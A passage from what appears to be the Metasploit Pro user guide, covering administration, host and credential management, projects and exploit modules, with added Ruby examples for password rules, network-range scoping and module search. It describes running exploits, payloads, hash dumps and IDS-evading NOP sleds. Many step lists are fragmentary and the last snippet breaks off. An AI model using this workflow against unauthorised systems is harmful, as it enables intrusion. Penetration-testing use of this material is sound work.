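# Constructed sample of common passwords; Metasploit Pro's real list is not
# documented on this page (assumption).
COMMON_PASSWORDS = %w[password password1 123456 12345678 qwerty letmein welcome admin].freeze

# Assumption: four or more characters that repeat, ascend, or descend in
# single steps (e.g. "aaaa", "abcd", "4321") count as a predictable sequence.
SEQUENCE_RUN = 4

def predictable_sequence?(password)
  codes = password.downcase.chars.map(&:ord)
  return false if codes.length < SEQUENCE_RUN
  codes.each_cons(SEQUENCE_RUN).any? do |run|
    deltas = run.each_cons(2).map { |a, b| b - a }
    deltas.uniq.length == 1 && deltas.first.abs <= 1
  end
end

# Returns an array of human-readable violations; empty means the password
# satisfies every rule from the guide.
def password_violations(username, password)
  violations = []
  violations << "must contain at least eight characters" if password.length < 8
  violations << "must contain letters" unless password.match?(/[A-Za-z]/)
  violations << "must contain numbers" unless password.match?(/\d/)
  violations << "must contain at least one special character" unless password.match?(/[^A-Za-z0-9]/)
  if !username.to_s.empty? && password.downcase.include?(username.downcase)
    violations << "cannot contain the user name"
  end
  violations << "cannot be a common password" if COMMON_PASSWORDS.include?(password.downcase)
  violations << "cannot use a predictable sequence of characters" if predictable_sequence?(password)
  violations
end

def valid_password?(username, password)
  password_violations(username, password).empty?
end

if __FILE__ == $PROGRAM_NAME
  [["alice", "Tr0ub4dor&3"], ["alice", "alice2024!"], ["bob", "abcd1234!"]].each do |user, pw|
    puts "#{user} / #{pw}: #{password_violations(user, pw).inspect}"
  end
end
```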
System Management
As an administrator, you have to update and maintain Metasploit Pro to ensure that you have the latest bug fixes, features, and modules. There are a couple of ways to determine when an update is available. You can view the Product News panel to learn when the Metasploit team has released an update, or you can set up an alert that appears when an update is available to install. Additionally, as an administrator, you can configure the global settings that apply to all projects. The global settings include payload settings, mail server settings, API keys, listeners, Nexpose consoles, and Metasploit services.
Global Settings
Global settings define settings that all projects use. You can access global settings from the Administration menu. From the global settings, you can set the payload type for the modules and enable access to the diagnostic console through a web browser. Additionally, from global settings, you can create API keys, post-exploitation macros, persistent listeners, and Nexpose Consoles.
3. Update the settings. The settings that you define automatically fill the HTTP proxy server settings when you perform an update.
In order to utilize e-mail capabilities, you must have access to a local mail server or a web mail server. You need the address and port that the mail server runs on, the domain name that hosts the mail service, and the credentials for the mail server.
1. Choose Administration > Global Settings from the main menu.
   Address - The address to the remote mail server. For example, use 127.0.0.1 or localhost if the mail server runs on your local machine.
   Port - The port that the mail server uses. The default port is 25.
   Domain - The fully qualified domain name that hosts the mail server. For example, use sitename.com.
   User Name - The user name that the system uses to authenticate to the mail server.
   Password - The password that the system uses to authenticate to the mail server.
   Authentication - The authentication type that the mail server uses. Choose from plain, login, and cram_md5.
Removing Metasploit
When you uninstall Metasploit Pro, you remove the Metasploit components and modules from the system and delete the data stored within the projects. If you remove Metasploit Pro, you will no longer be able to access or view any information that projects contain. Therefore, before you remove Metasploit Pro and its components, you should export any data that you may want to save, such as reports and host data.
3. Click Yes to confirm that you want to delete all saved project data.
4. Click OK when the process completes.
5. Click Yes to confirm that you want to uninstall Metasploit Pro components and modules.
6. Click Yes to confirm that you want to delete the data saved in the projects. If you click No, the $INSTALLER_ROOT/apps directory remains intact, and you can continue to access the Metasploit data stored in this directory.
License Keys
A license key defines the commercial edition and the registered owner of Metasploit Pro. Metasploit Pro uses the license key to identify the number of days that remain on the license and the number of users that the license key allows. Metasploit licenses are perpetual licenses, which enable you to use the application indefinitely. However, the license itself expires every year. When the license expires, you must renew the license if you want to continue to receive updates for Metasploit. You can still run Metasploit, but you can only run the last version that was released before your license key expired. To access the license key area, select Administration > Software License from the Global Menu.
When the license key request page appears, choose whether you want to trial Metasploit Pro or obtain a Metasploit Community license key.
Note: 3790 is the default port that the Metasploit service uses. If you assigned the Metasploit service to a different port during the installation process, use that port instead.
2. If you receive a warning about the trustworthiness of the security certificate, select that you understand the risks and want to continue to the website. The wording that the warning displays depends on the browser that you use.
3. When the web interface for Metasploit Pro appears, the New User Setup page displays if this is a first time activation. Follow the onscreen instructions to create a user account for Metasploit Pro. Save the user account information so that you can use it later to log in to Metasploit Pro.
4. After you create a user account, the Activate Metasploit page appears. Enter the license key that you received from Rapid7 in the Product Key field.
   Note: If you need to use an HTTP proxy to reach the Internet, you can select the HTTP proxy option and provide the information for the HTTP proxy server that you want to use.
5. Click the Activate License button. After you activate the license key, the Projects page appears.
3. When the Offline Activation window appears, browse to the location of the activation file.
4. Select the activation file.
5. Click Activate Product to complete the activation.
2. If the system detects that there is a previous license key, you will see the Revert to Previous License area. Click Revert License. The License Details window appears after the system successfully reverts to the previous license key.
Services
If you attempt to launch Metasploit Pro, and you receive the "Metasploit is initializing" message, you may need to restart the Metasploit services. This error typically occurs after you install or update Metasploit Pro. If you have recently installed Metasploit Pro, you may need to wait a few minutes for it to load after the installation completes. If it has been more than fifteen minutes since the installation finished, you should restart the Metasploit services. If you recently updated Metasploit Pro, the services were automatically restarted after the update completed. You should wait a few minutes to see if the Metasploit services start up again. If they do not, you should manually restart the services.
4. Enter your sudo password when the system prompts you for it. After you enter the sudo password, the system stops and restarts all services associated with Metasploit. This includes prosvc, thin, and PostgreSQL. After the system restarts the services, wait a few minutes before you access the Metasploit Web Interface.
Logs
Metasploit Pro stores system events in log files. You can use the information in the log files to troubleshoot issues with Metasploit Pro. For example, if you need to troubleshoot an issue with updates, you can view the license log to see a list of events related to product activation, license keys, and updates. Please note that log files can become large over time. To reduce the amount of disk space the log files consume, regularly review and clear log files. Use the following log files to troubleshoot issues with Metasploit Pro:
- Framework log - Details information about loading the Metasploit Framework. Use this log to troubleshoot issues with modules.
- License log - Details product licensing and product updates. Use this log to troubleshoot problems that you may have with applying a license key or installing an update.
- PostgreSQL log - Details the start up and shutdown notices. Use this log to troubleshoot SQL query bugs and to understand the current state of the database.
- Production log - Details all Rails actions, such as the refresh data and routing errors. Use this log to troubleshoot Rails issues and to trace the actions that were taken for a particular connection.
- Pro service error log - Details errors for the Metasploit Pro service engine. Use this log to troubleshoot errors with the Metasploit service.
- Thin log - Details the location of the PID file. Use this log to diagnose issues between Rails and Nginx.
- Web server error log - Details Nginx errors. Use this log to determine if an issue is related to Nginx rather than Rails or Pro Service.
- Web server access log - Details every GET and POST request to Nginx and logs successful HTTP requests. Use this log to track down Rails issues.
Framework log - $INSTALL_ROOT/apps/pro/engine/config/logs/framework.log
License log - $INSTALL_ROOT/apps/pro/engine/license.log
Production log - $INSTALL_ROOT/apps/pro/ui/log/production.log
Pro service log - $INSTALL_ROOT/apps/pro/engine/prosvc.log
Tasks log - $INSTALL_ROOT/apps/pro/engine/tasks
Thin log - $INSTALL_ROOT/apps/pro/ui/log/thin.log
Web server error log - $INSTALL_ROOT/apache2/logs/error_log
Web server access log - $INSTALL_ROOT/apache2/logs/access_log
System Updates
In order to keep your copy of Metasploit Pro up to date with the latest fixes, enhancements, and modules, you need to install system updates when they are available. When there is a new update available, Metasploit Pro flashes a real-time alert in the Main menu. The Metasploit team typically releases weekly updates, so you need to update Metasploit Pro regularly to get the latest code base.
Note: If you do not see update alerts, you will need to change the system settings to allow the alerts to display.
Notification Center
Notification Center is the notification system for Metasploit Pro that alerts you when a task completes or when a software update is available. It displays as a dropdown banner from the Global Menu and provides a unified view of system-wide alerts for all projects. The Notification Center icon displays the total number of new alerts that are available. All new notifications are highlighted with a green bar. You can click on a notification to access the associated page in the user interface. Most task and MetaModule notifications will take you to the Task log. All system notifications will take you to the Software Updates page.
Accessing Notification Center
To access Notification Center, click on the notification icon in the upper-right hand corner of the Global Menu.
Notification Events
Notification Center displays alerts when the following events occur:
- A MetaModule run completes.
- A task run, such as a Discovery Scan or Bruteforce Attack, completes.
- A software update is available.
2. Click the Show dropdown button and choose the event type you want to use to sort the notifications. You can choose from MetaModules, Tasks, and System.
3. After you choose an event type, Notification Center updates the alerts.
Clearing a Notification
1. From the Global Menu, click on the Notification Center icon.
2. When the Software Updates window appears, select the Use an HTTP Proxy to reach the internet option if you want to use an HTTP proxy server to check for updates. If you select this option, the proxy settings appear. Configure the settings for the HTTP proxy that you want to use.
3. Click the Check for updates button. If an update is available, the system shows you the latest version number and provides an install button for you to use to update the system.
3. Identify the current release version of Metasploit that you have installed.
   Note: You will see the product edition, the release version, and the update version. For example, in Metasploit Pro 4.6.0 - update 2013050101, the release version is 4.6.0.
4. From the e-mail that you have received from Rapid7, find and download the offline update files that you need.
5. From within Metasploit, select Administration > Software Updates from the Global menu.
8. Browse to the location of the offline update file and select it.
   The offline update file is the bin file that you downloaded from the Rapid7 e-mail.
10. Click the Install Update button.
Metasploit installs the update and restarts the Metasploit service when the update is done. Please wait a few minutes for the service to restart. If there are additional updates that you need to install, you must repeat this process until you have the latest version of Metasploit.
4. If an update is available, the system shows you the latest version number and provides an install button for you to use to update the system.
5. Install the update. After the update completes, Metasploit Pro prompts you to restart the back end services. If you restart the services, Metasploit Pro terminates active sessions and requires up to ten minutes to restart.
Chapter 4: Host Management
In Metasploit Pro, a host refers to a device on a network and is represented by its IP address or server name. Hosts are typically fingerprinted, enumerated, and added to a project during a Discovery Scan, data import, or Nexpose Scan. To view the hosts in a project, go to the Analysis area. All hosts stored in the project are viewable, searchable, and editable from the Analysis area of the user interface. To learn more about host management, read the following topics:
- Host Management Interfaces on page 63
- Viewing and Editing Host Metadata on page 65
- Adding, Editing, and Deleting Services on page 71
- Adding, Editing, and Deleting Vulnerabilities on page 75
- Host Management on page 62
- Adding, Editing, Downloading, and Deleting Captured Data on page 91
Project view - Provides a high-level view of all the hosts and data that are stored in the project. To access the project view, click on the Analysis tab. The project view initially shows the Hosts list, which displays the fingerprint and enumerated ports and services for each host. In addition to the Hosts list, you can view the notes, services, vulnerabilities, and captured data from the project view. To access these other views, you can click on their tabs from the project view.
Single host view - Displays the details for a specific host, such as the services, sessions, vulnerabilities, credentials, captured data, notes, file shares, tags, exploit attempts, available modules, and source. To access the single host view, click on a host IP address.
Hosts page - Lists all the hosts in a project and shows their operating system, purpose, tags, and counts for services and vulnerabilities.
Notes page - Lists the notes, or additional bits of information, that Metasploit Pro was able to collect from a host during a scan.
Services page - Lists the services that were enumerated and shows their port number, port state, and the host that each one is running on.
Vulnerabilities page - Lists the vulnerabilities that have been imported from a vulnerability scanner or ones that have been found by Metasploit Pro. You can create vulnerability exceptions and push validated vulnerabilities back to Nexpose from the Vulnerabilities page.
Captured Data page - Lists all the loot and evidence that was collected from all hosts in the project. You can view or download captured data files from this page.
Network Topology - Shows a diagram of the physical layout of a target network.
3. Click on the Edit icon. The Host Information window displays the metadata for the host.
3. Click on the Edit icon. The Host Information window displays the metadata for the host.
4. Click on the Edit icon for the metadata field you want to add or modify. The field becomes editable.
Note: The following metadata fields can be edited: host address, host name, host MAC address, OS name, OS flavor, OS service pack, and OS purpose.
5. Enter the information you want to use in the field. For example, if you know the service pack, you can add it to the SP field.
6. Click the Save link when you are done.
3. Fill out the Name and Address section with the host's network details. At a minimum, you will need to specify the host name and host IP address.
4. Fill out the Operating System section, if you know the OS that runs on the host. If you do not have this information, you can skip this step.
   Note: You can additionally specify the OS version, OS flavor, and Purpose. These fields are optional.
5. Select the Lock edited host attributes option if you do not want the host metadata to be editable. If you select this option, team members and subsequent scans/imports will not be able to modify the host metadata.
6. Click on the Add Service link, if you know there is a specific service running on the host that you want to add. You can add as many services as you need.
3. Click the New Service button. The New Service modal window appears.
Name - The service name, such as HTTP, DNS, or SMTP.
Port - The port that the service runs on.
Protocol - The protocol, TCP or UDP, that the port uses.
State - The port state can be open, closed, filtered, or unknown.
Info - Any additional information that you may have about the service, such as the version that is running.
Editing a Service
To edit a service:
1. From within a project, select Analysis > Hosts from the Project Tab bar. The Hosts page appears.
2. Click on the IP address for the host whose services you want to edit. The single host page opens and shows the Services list.
3. Click the Edit icon that is located in the same row as the service you want to modify. The Name, Port, Protocol, and State fields become editable.
3. Find the service that you want to delete.
4. Click the Delete button that is located in the same row as the service. A confirmation window appears.
4. Click the New Vuln button. The New Vulnerability modal window appears.
6. Click the Add Ref button. The Reference field becomes editable.
8. If you have additional references you would like to add for the vulnerability, click on the Add Ref button and repeat the previous step.
9. Click the Submit button when you are done.
4. Click the Edit icon that is located in the same row as the vulnerability you want to edit. The Edit Vulnerability window appears.
6. Edit the vulnerability reference ID or URL.
7. Click the Submit button when you are done.
4. Click the Edit icon that is located in the same row as the vulnerability you want to edit.
5. Find the reference you want to delete and click the Delete icon. The reference is removed from the list.
   Note: If you have additional references you would like to delete, repeat the previous step until you are done.
4. Click the Delete icon that is located in the same row as the vulnerability you want to remove. A confirmation window appears.
5. Click OK to delete the vulnerability. The vulnerability is removed from the list.
2. Click the Grouped View button in the Quick Tasks bar. The project displays the individual vulnerabilities in the project.
3. Select the vulnerabilities you want to delete from the project.
   Note: When you delete vulnerabilities from the grouped view, it removes them from all of the hosts that currently have them.
4. Click the Delete Vulnerabilities button in the Quick Tasks bar. A confirmation window appears.
Timestamp - The time the credential was added to the project.
Service - The service that was authenticated with the credentials.
Type - The type of loot collected, such as read/write password, read-only password, SMB hash, SSH public key, or SSH private key.
User - The user name that can be used to authenticate to a service.
Password, Hash, or SSH Key Fingerprint - The plaintext password or raw data for an SMB hash or SSH key that can be used to authenticate to a service.
Source Credential or Session - Indicates how the loot was obtained. Sources can be one of the following:
- Guessed - The source type indicates that the credentials were obtained from a bruteforce attack.
- Imported - The source type indicates that the credentials were obtained from a credentials list import.
- Unverified - The source type indicates an inactive credential.
- Unknown - The source type indicates that Metasploit Pro was unable to find a source match.
- <User:pass> - The source type indicates that the credential pair was created from another credential pair.
- Link to a session - The source type indicates that the credentials were obtained from collecting evidence from an active session.
4. Click the New Cred button. The New Credentials modal window appears.
Service - The service that can be authenticated with the credentials. The most common ports and services are listed for you to choose from.
Type - The type of credentials that you are adding. Choose between the following credential types: read/write, read-only, SMB hash, SSH private key, and SSH public key.
User - The user name for the credential pair.
Password - The password, hash, or key for the credential pair.
Note: You can leave the user name and password fields empty for blank credentials. If you are adding an SSH key, you will need to copy and paste the contents of the key into the Password field.
6. Click the Submit button when you are done. The credential pair is added to the Credentials list.
4. Click the Edit icon that is located in the same row as the credential pair you want to modify. The Service, Type, User, and Password fields become editable.
5. Click the Delete button that is located in the same row as the credential pair. A confirmation window appears.
3. Click the Captured Data tab. The Captured Data list appears.
4. Click the New Captured Data button. The New Captured Data modal window appears.
5. Click the Choose File button to navigate to the location of the file you want to upload.
   Note: You can upload any type of loot that you've collected, such as password files, screenshots, and system files.
6. Enter a name for the file in the Name field. By default, this field is populated with the original file name.
7. Enter the content type. For example, the content type can be any of the supported MIME content types, like text/plain, image/jpeg, or text/html.
8. Enter any additional information you want to provide about the file in the Info field.
9. Click Submit when you are ready to upload the file.
3. Click the Captured Data tab. The Captured Data list appears.
4. Find the captured data file you want to download. If you have more than 10 files, you can either click on the page numbers to navigate through the captured data files or you can increase the number of entries that the page displays.
5. Click the Download link that is located in the same row as the file you want to download. The file is downloaded and saved to your local system.
3. Click the Captured Data tab. The Captured Data list appears.
4. Find the captured data file you want to view. If you have more than 10 files, you can either click on the page numbers to navigate through the captured data files or you can increase the number of entries that the page displays.
5. Click the View link that is located in the same row as the file you want to view. The file opens in a modal window.
From within a project, select Analysis > Captured Data from the Project Tab bar. The Captured Data page appears and lists all files that are stored in the project. You can download or view files directly from the Captured Data page.
Chapter 5: Projects
The first step to set up a penetration test is to create a project. A project represents the workspace that you use to create and run a test. You create projects to separate your tests and engagements into logical groupings.
- About Projects on page 97
- Project Management on page 98
- Team Collaboration on page 109
- Host Comments on page 112
About Projects
A project contains the workspace that you use to perform the different steps for a penetration test and store the data that you collect from the target. You create a project to configure tasks and to run tests. You can create as many projects as you need, and you can switch between projects while tasks are in progress.
From within a project, you define the target systems that you want to test and configure the tasks that you want to run against those targets. For example, you can scan targets for active services and hosts, attempt to exploit vulnerabilities, collect data from exploited machines, and generate reports that detail your findings.
Every project has an owner. The owner can choose the users who can access the project to edit, view, and run tasks. However, users with administrative access can view and edit any project, regardless of whether or not the project owner gives them access.
You can create projects to separate an engagement into logical groupings. Oftentimes, you may have different requirements for the various departments, or subnets, within an organization. Therefore, it may be more efficient for you to have different projects to represent those requirements. For example, you may want to create a project for the human resources department and another project for the IT department. Your requirements for these departments may vary greatly, so it would be logical for you to separate the targets into different projects. At the end of the engagement, you can generate separate reports for each department to perform a comparative analysis and present your findings to your organization or client.
Project Components
The following components are part of a project:
- Name - Provides a unique identifier for the project.
- Description - Describes the purpose and scope of the project.
- Network range - Defines the default network range for the project. When you create a project, Metasploit Pro automatically populates the default target range with the network range that you define for the project. Metasploit Pro does not force the project to use the network range unless you enable the network range restriction option.
- Network range restriction - An option that restricts a project to a specific network range. Enable this option if you want to ensure that the test does not target devices outside the scope of the engagement. If you enable this option, Metasploit Pro will not run tasks against a target whose address does not fall within the network range.
Project Management
Each project has a name, description, network range, and user access list. As a project owner or an administrator, you can edit the project settings, choose the users who can access the project, and manage the data that the project contains.
Creating a Project
A project is the workspace that you use to build a penetration test. Each project logically groups together the hosts that you want to exploit and the type of information that you want to obtain. Every project has a name, description, and network range. After you create a project, you need to run a discovery scan or an import to bring host data into the project.
1. From the Projects page, click the New Project button.
2. When the New Project page appears, find the Project Settings area, and enter the following information:
   Project name - This is a unique identifier that helps you differentiate between projects.
   Description - This is a summary of the purpose and scope of the project.
   Network range - This is the default network range that the project uses. The network range sets the default address range that automatically populates the Target Addresses field in discovery scans and Nexpose scans. Metasploit Pro does not enforce the network address range unless you enable the network restriction option. If you want to enter multiple network ranges, use a comma to separate each one.
3. Select Restrict to network range if you want to enforce network boundaries on the project.
4. From the User Access area, select the following information:
   Project owner - This is the person who owns the project.
   Project members - These are the users who can access, edit, and run the test.
3. When the Import Data page appears, click on the Browse button to open the File Upload window.
4. When the File Upload window appears, browse to the location of the Metasploit ZIP file.
5. If you do not want to import the information for a specific host, you can enter the IP address for that host in the Exclude Addresses field. If you need to enter multiple hosts, you need to use a comma to separate each address.
6. If you do not want the import to overwrite data for an existing host, you must select the Do not change existing hosts option.
7. Click the Import Data button.
Deleting a Project
When you delete a project, you remove all the data that the project contains, including reports, host data, evidence, vulnerability data, and host tags. After you delete a project, you cannot view or access the project again. If you want to delete the project, but save the project data, you can export the project data. When you export the project data, the system provides you with an XML or ZIP file of the project contents. You can import the XML or ZIP file to bring the project data back into Metasploit Pro.
1. Select Project > Show All Projects from the Main menu.
2. When the Projects page appears, select the projects that you want to delete.
3. Click Delete.
2. When the Projects page appears, select the project that you want to assign an owner to.
3. Click the Settings button.
4. When the Project Settings page appears, find the User Access area.
5. Click the Project owner dropdown and select the person you want to assign the project to.
2. When the Projects page appears, select the project that you want to edit.
3. Click the Settings button.
4. When the Project Settings page appears, find the User Access area.
5. Select project members to enable them to view and modify the project, or deselect project members to prevent them from modifying the project.
2. Select the project that you want to set the network range for.
4. In the Network range field, enter the network range that you want to restrict the project to. You can enter a single IP address, an IP range described with hyphens, or a standard CIDR notation. If you define a CIDR notation, you can use an asterisk as a wild card. For example, 192.168.1.* indicates 192.168.1.1-255.
3. In the Network range field, enter the network range that you want to restrict the project to. You can enter a single IP address, an IP range described with hyphens, or a standard CIDR notation. If you define a CIDR notation, you can use an asterisk as a wild card. For example, 192.168.184.* indicates 192.168.184.1-255.
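As an added example (not Metasploit Pro's own code) for the network range syntax described here and under Creating a Project, the following Ruby code expands a comma-separated Network range field (single IP, hyphenated range, CIDR block, or trailing asterisk wildcard) and applies the network range restriction by checking whether each target falls inside it. The abbreviated hyphen form 192.168.1.10-20 is an assumption; the page only shows the full forms.

```ruby
require 'ipaddr'

# Added example, not Metasploit Pro's own code. Expands one term of the
# Network range field to an inclusive [first, last] pair of integer addresses.
def expand_range_term(term)
  term = term.strip
  case term
  when /\A(\d+\.\d+\.\d+)\.\*\z/
    # The guide states that 192.168.1.* means 192.168.1.1-255, so the .0
    # address of the block is deliberately excluded.
    base = IPAddr.new("#{Regexp.last_match(1)}.0").to_i
    [base + 1, base + 255]
  when %r{/}
    # Standard CIDR notation, e.g. 10.0.0.0/24; IPAddr masks host bits itself.
    net = IPAddr.new(term).to_range
    [net.first.to_i, net.last.to_i]
  when /-/
    first, last = term.split('-', 2)
    # Assumption: a bare last octet after the hyphen (192.168.1.10-20)
    # abbreviates an address in the same /24 as the start of the range.
    last = "#{first.rpartition('.').first}.#{last}" unless last.include?('.')
    lo = IPAddr.new(first).to_i
    hi = IPAddr.new(last).to_i
    raise ArgumentError, "range end precedes start: #{term}" if hi < lo
    [lo, hi]
  else
    addr = IPAddr.new(term).to_i   # a single IP address
    [addr, addr]
  end
end

# Parses the whole comma-separated field into a list of [lo, hi] pairs.
def parse_network_range(field)
  field.split(',').reject { |t| t.strip.empty? }.map { |t| expand_range_term(t) }
end

# True when the target lies inside at least one configured range.
def in_scope?(target, ranges)
  t = IPAddr.new(target).to_i
  ranges.any? { |lo, hi| t.between?(lo, hi) }
end

# Mirrors the "Restrict to network range" option: returns the targets a task
# may run against and those that would be skipped as outside the project scope.
def partition_targets(targets, field)
  ranges = parse_network_range(field)
  targets.partition { |ip| in_scope?(ip, ranges) }
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample: a project range plus a target list that strays outside it.
  allowed, skipped = partition_targets(%w[192.168.1.5 192.168.2.5 172.16.0.9],
                                       "192.168.1.*, 172.16.0.0/16")
  puts "in scope: #{allowed.join(', ')}"
  puts "skipped:  #{skipped.join(', ')}"
end
```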
Team Collaboration
The multi-user support provides you with the ability to collaborate on an engagement or penetration test with other team members. You and your team can log into the same instance of Metasploit Pro to perform tasks, review data, and share projects. You can access Metasploit Pro through the Metasploit Web UI, which can run on the local machine or across the network. Some features that you can implement to enhance team collaboration are network boundaries, host tags, and host comments. These features help you create separate workloads for each team member and organize an engagement into logical containers. For example, you may want to assign certain hosts to a specific team member to test.
3. Find the User Access settings. The User Access list displays all Metasploit Pro users.
4. Click the Settings button.
5. Select the users that you want to have access to the project.
2. Find the User Access settings. The User Access list displays all available Metasploit Pro users.
3. Deselect the users that you do not want to have access to the project.
3. Click the Settings button.
4. Find the User Access settings. The User Access list displays all available Metasploit Pro users.
5. From the Project Owner dropdown menu, choose an owner for the project.
Host Comments
You can add a host comment to share information about a host. For example, if you identify a vulnerability on a host, and you want to share that information with other project users, you can add a host comment to that host. When you view the host details, you can see comments that other users have added to the host.
2. Click on the name of the host to which you want to add a comment.
3. When the Host Details page appears, click the Update Comment button.
4. Enter the information you want to add to the host in the Comments field. For example, if you know that a host is not exploitable, you can add the information as a comment. When other team members see the note, they know that they should not attempt to exploit the host.
5. Click the Save Comments button.
Chapter 6: Modules
About Modules on page 117
Module Search on page 121
Module Statistics on page 123
Module Types on page 117
Module Rankings on page 124
About Modules
Modules are the underlying core components of the Metasploit Framework. They provide the components and capabilities that Metasploit Pro needs to perform an attack or execute a task, such as exploiting a target or fingerprinting a host. Every task that Metasploit Pro performs is defined within a module. When you configure tasks and run them from the user interface, Metasploit Pro does a lot of work behind the scenes to select the appropriate modules that it needs to run. For example, the bruteforce attack runs a combination of service-specific modules that focus on the services that are running on the target hosts. Metasploit Pro builds an attack plan based on the services that have been identified by the discovery scan or import. If you want to learn more about a particular module, you can use the built-in module search engine or you can visit the Metasploit Exploit Database.
Modules Directory
Your local version of Metasploit Pro has a copy of the Metasploit Framework, which contains most of the modules that the exploit database contains. If you want to review the modules that are available on your local machine, you can browse to $INSTALL/metasploit/msf3/modules. The modules are categorized by type first and by protocol next. For example, you can find FTP fuzzers in the following location: $INSTALL/metasploit/msf3/modules/auxiliary/fuzzers/ftp.
Module Types
The Metasploit Framework categorizes modules based on the type of action that the module performs. The majority of modules are either an exploit or an auxiliary module. Generally, if a module can obtain a shell on a remote machine, it is an exploit module. Otherwise, it is an auxiliary module.
Exploit Modules
An exploit module executes a sequence of commands to target a specific vulnerability found in a system or application. An exploit module takes advantage of a vulnerability to provide control of the target system. Generally, you use exploit modules to achieve remote code execution on a target machine, targeting remote services and client-side applications. Some examples of exploits include buffer overflow, code injection, and web application exploits.
An exploit can be a client-side or server-side exploit. A client-side exploit typically occurs through the use of social engineering techniques. Server-side exploits, on the other hand, take advantage of active services on an exposed server.
Auxiliary Modules
Most modules that are not an exploit can be considered an auxiliary module. An auxiliary module is any module that does not execute a payload. Instead, it performs arbitrary actions that may not be directly related to exploitation and provides supplementary support for tasks that you need to perform during a penetration test. Examples of auxiliary modules include vulnerability scanners, port scanners, fuzzers, and denial of service attacks.
Payload Modules
A payload is the shellcode that runs after an exploit successfully compromises a system. The payload enables you to define how you want to connect to the shell and what you want to do to the target system after you take control of it. A payload can open a Meterpreter or command shell. Meterpreter is an advanced payload that allows you to write DLL files to dynamically create new features as you need them. For more information on Meterpreter, see the Meterpreter User Guide.
NOP Modules
A NOP generator produces a series of random bytes that you can use to bypass standard IDS and IPS NOP sled signatures. Use NOP generators to pad buffers.
Post-Exploitation Modules
A post-exploitation module enables you to gather more information or to gain further access to an exploited target system. Examples of post-exploitation modules include hash dumps and application and service enumerators.
Oracle - Affects modules that target Oracle.
Lorcon2 - Affects modules that target wireless systems.
Libpcap - Affects modules that target sniffers.
DECT - Affects modules that target telephony.
Target Addresses - The hosts targeted by the exploit. Leave this field blank to include all hosts in the project.
Excluded Addresses - The hosts excluded from the attack. Leave this field blank to include all hosts in the project.
Exploit Timeout - The number of minutes the module has before it times out.
Payload Type - The type of shell that the exploit obtains.
Connection Type - The direction of the connection.
Listener Ports - The port on the machine that the listener listens on.
Listener Host - The address of the machine that the listener listens on.
RPORT - The target port.
RHOST - The target address.
VHOST - The address for the HTTP virtual server.
LHOST - The address for the local host.
LPORT - The listener port on the local host.
Running a Module
1. From within a project, select Modules > Search.
2. Use the search engine to find a module. You can utilize the keywords to either narrow down your search or to find a specific module. For example, if you want to search for Windows exploits, you can search for platform:windows, or if you want to search specifically for the ms08-067 exploit, you can search for path:ms08_067_netapi.
3. After you find the module that you want to use, click on the module name to open the configuration page.
4. At a minimum, you should define the IP addresses of the target systems that you want to include in or exclude from the exploit. If you do not specify any target addresses, Metasploit Pro includes all hosts that are in the project.
5. Optionally, you can define any advanced options and evasion options that are available.
Note: The options that are available vary between different modules. By default, each module is preconfigured with default settings that are appropriate for you to run against a target. The payloads will be preselected based on the intended target. For example, Metasploit Pro will use Meterpreter for Windows targets and the command shell for Linux/UNIX targets.
6. After you configure the options for the module, click the Run Module button to launch the module.
Module Search
The module search engine searches the module database for the search term and returns a list of results that match the query. Use the module search engine to find the module that you want to run against a target. You can utilize keyword tags to perform a targeted search. This reduces the number of results that the system returns.
Keyword Tags
You can use keyword tags to define a keyword expression. A keyword tag is a keyword that helps you efficiently search for a module. If you want to search for a module that addresses a specific CVE, you can use the CVE tag to search for modules that reference it. For example, if you know the CVE ID of the exploit you want to use is 2008-4250, you can search for CVE:2008-4250. This search returns an exploit for the ms08-067 vulnerability. The following table lists the keyword tags:
app - Searches for modules that are either a client or server attack. Example: app:client
name - Searches for the keyword expression within the module descriptive name. Example: name:Java
platform - Searches for the modules that affect the platform or target that you define in the keyword expression. Example: platform:linux
path - Searches for the keyword expression within module path name. Example: path:windows/smb
type - Searches for the modules that belong to the module type that you define in the keyword expression. For example, use exploit, auxiliary, or post. Example: type:exploit
Module Statistics
Module statistics show the total number of modules that are available and show the number of modules that are available for each type of module. Module types include exploit modules, auxiliary modules, server-side exploits, and client-side exploits.
Module Rankings
Module rankings provide details about the reliability and impact of an exploit on a target system. Every module in the Metasploit Framework has a ranking, which is based on how likely the exploit will disrupt the service. There are six possible rankings. The higher rankings indicate that the exploit is less likely to cause instability or crash the target system. Use the following rankings to determine the reliability of a module:
Low - The exploit is unstable and unlikely to be successful. Do not use exploits with a low ranking.
Average - The exploit can be unstable and unreliable. Do not use exploits with an average ranking.
Normal - The exploit is generally reliable, but cannot auto-detect the default target.
Good - The exploit has a default target.
Great - The exploit has a default target and can automatically detect the correct target.
Excellent - The exploit never crashes the service. Examples of exploits that have an excellent ranking are SQL injections and CMD executions.
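An added example, not Metasploit Pro code, that applies the keyword tags from the Module Search section (app, name, platform, path, type, CVE) together with a minimum-ranking floor, so that low- and average-ranked exploits can be filtered out as the rankings above advise. The module catalog is a constructed sample; only the ms08_067_netapi path and CVE-2008-4250 come from the guide, and the hash keys and function names are my own.

```ruby
# Keyword-tag module search with a minimum-ranking filter, mirroring the
# guide's search tags and its six module rankings (low .. excellent).
# Added example, not Metasploit Pro code; SAMPLE_MODULES is constructed
# (only ms08_067_netapi / CVE-2008-4250 are taken from the guide).

RANKS = %w[low average normal good great excellent].freeze  # guide order, low to high
TAGS  = %w[app name platform path type cve].freeze

SAMPLE_MODULES = [
  { path: 'exploit/windows/smb/ms08_067_netapi', name: 'MS08-067 Microsoft Server Service Relative Path Stack Corruption',
    type: 'exploit', platform: 'windows', app: 'server', cves: ['CVE-2008-4250'], rank: 'great' },
  { path: 'exploit/windows/browser/sample_java_applet', name: 'Sample Java Applet Handler (constructed)',
    type: 'exploit', platform: 'windows', app: 'client', cves: [], rank: 'average' },
  { path: 'exploit/linux/http/sample_cmd_exec', name: 'Sample HTTP Command Execution (constructed)',
    type: 'exploit', platform: 'linux', app: 'server', cves: [], rank: 'excellent' },
  { path: 'auxiliary/fuzzers/ftp/sample_ftp_fuzzer', name: 'Sample FTP Fuzzer (constructed)',
    type: 'auxiliary', platform: '', app: 'server', cves: [], rank: 'normal' },
  { path: 'post/windows/gather/sample_hashdump', name: 'Sample Hash Dump (constructed)',
    type: 'post', platform: 'windows', app: '', cves: [], rank: 'normal' }
].freeze

# "platform:windows type:exploit" -> [['platform', 'windows'], ['type', 'exploit']]
# Untagged words become ['text', word] and match the module name or path.
def parse_module_query(query)
  query.split.map do |token|
    tag, value = token.split(':', 2)
    if value && TAGS.include?(tag.downcase)
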